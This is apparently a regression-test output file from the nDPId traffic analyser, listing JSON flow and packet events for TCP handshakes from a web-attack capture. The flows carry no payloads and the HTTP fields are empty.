+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":3,"flow_last_seen":1499347812798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347812798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Yt1AAD4GYvusEAABwKgKMoDAAFAQTEPhWyVuOoAQAOVHQQAAAQEICgE8ITwD5fKw"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347814066,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347814066,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NuNAAD4Gju2sEAABwKgKMoDOAFApMBSaAAAAAKACchB8ZgAAAgQFtAQCCAoBPCJ5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":2,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgM6yTRTHKTAUm6AScSC+XAAAAgQFtAQCCAoD5fPuATwieQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":3,"flow_last_seen":1499347814067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347814067,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NuRAAD4GjvSsEAABwKgKMoDOAFApMBSbsk0UyIAQAOVdZAAAAQEICgE8InkD5fPu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347815351,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347815351,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aqNAAD4GWy2sEAABwKgKMoDcAFBV2UkZAAAAAKACchAZ7wAAAgQFtAQCCAoBPCO6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":2,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgNzeXu4gVdlJGqAScSBVOQAAAgQFtAQCCAoD5fUvATwjugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":3,"flow_last_seen":1499347815352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347815352,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aqRAAD4GWzSsEAABwKgKMoDcAFBV2Uka3l7uIYAQAOX0PwAAAQEICgE8I7sD5fUv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347816657,"flow_last_seen":1499347816657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347816657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1499347816657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lQ1AAD4GMMOsEAABwKgKMoDqAFAyzLAMAAAAAKACchDUswAAAgQFtAQCCAoBPCUBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":2,"flow_last_seen":1499347816658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgOp6zxHVMsywDaAScSBOkwAAAgQFtAQCCAoD5fZ1ATwlAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":3,"flow_last_seen":1499347816658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347816658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lQ5AAD4GMMqsEAABwKgKMoDqAFAyzLANes8R1oAQAOXtmgAAAQEICgE8JQED5fZ1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347819250,"flow_last_seen":1499347819250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347819250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1499347819250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LORAAD4GmOysEAABwKgKMoEEAFDtQwttAAAAAKACchC8OQAAAgQFtAQCCAoBPCeJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":2,"flow_last_seen":1499347819251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgQQkyBmr7UMLbqAScSCBwQAAAgQFtAQCCAoD5fj+ATwniQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":3,"flow_last_seen":1499347819251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347819251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LOVAAD4GmPOsEAABwKgKMoEEAFDtQwtuJMgZrIAQAOUgyQAAAQEICgE8J4kD5fj+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347820510,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347820510,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zKZAAD4G+SmsEAABwKgKMoESAFBNgeRiAAAAAKACchCBvQAAAgQFtAQCCAoBPCjEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":2,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgRIUqvVqTYHkY6AScSB6aAAAAgQFtAQCCAoD5fo5ATwoxAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":3,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zKdAAD4G+TCsEAABwKgKMoESAFBNgeRjFKr1a4AQAOUZcAAAAQEICgE8KMQD5fo5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347823117,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vRAAD4GxtusEAABwKgKMoEsAFBFq9WkAAAAAKACchCVqwAAAgQFtAQCCAoBPCtQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":2,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgSyhFRrnRavVpaAScSDZ4wAAAgQFtAQCCAoD5fzEATwrUAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":3,"flow_last_seen":1499347823118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347823118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vVAAD4GxuKsEAABwKgKMoEsAFBFq9WloRUa6IAQAOV46wAAAQEICgE8K1AD5fzE"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 